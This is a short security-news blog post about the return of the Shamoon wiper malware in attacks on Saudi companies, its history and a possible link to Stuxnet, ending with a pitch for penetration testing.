A little over four years after Iran’s Shamoon malware was first used to cripple 30,000 computers at Saudi Arabian oil giant Saudi Aramco, the virus has returned. Hackers were able to gain access to the networks of 15 Saudi Arabian companies by using spear-phishing emails and abusing Office macros and PowerShell.
The campaign was carried out by a group identified as ‘Timberworm’, according to Symantec, and is part of a much larger operation infiltrating a far broader range of organisations than those targeted in the original Shamoon attacks.
The original Shamoon virus infected 30,000 computers at Saudi Aramco in 2012, as well as infiltrating over 50 aerospace, airline and petrol corporations, hospitals, and universities across the globe.
Images of a burning US flag were used to overwrite the hard drives of victims in the 2012 attacks. In its re-emergence, Reuters reports that a photograph of the body of three-year-old drowned Syrian refugee Alan Kurdi was used.
The reason for the return of Shamoon may be found in a top secret document from the National Security Agency (NSA). The document from April 2013, released as part of Edward Snowden’s leaks, warned that the Iranian government was planning to expand Iranian influence in the Middle East.
A response to Stuxnet
The NSA document also revealed that the US feared Shamoon was made possible because of the intelligence Iran gathered from Stuxnet.
The Stuxnet malware, a jointly built American–Israeli cyber weapon, was used to sabotage nuclear centrifuges in Iran’s Natanz nuclear facilities in 2010. The US is widely believed to have been behind the attack.
The similarities between the way Stuxnet and Shamoon operate mean that a connection between the two is certainly a possibility.
Ensure your company’s network security
While not all organisations are targets of international cyber warfare, many malware programs use similar techniques. In fact, as Symantec notes, Shamoon relies on off-the-shelf tools. This trend is becoming more common for cyber criminals, with attackers believing malicious activity will be more difficult to spot if legitimate tools are involved.
Organisations looking to assess or strengthen their security posture should consider booking an infrastructure penetration test.
The test helps organisations meet compliance requirements by ensuring that network devices meet regulatory requirements, such as the PCI DSS and ISO 27001, and it adopts real-world testing to reduce the risks to organisations’ infrastructure.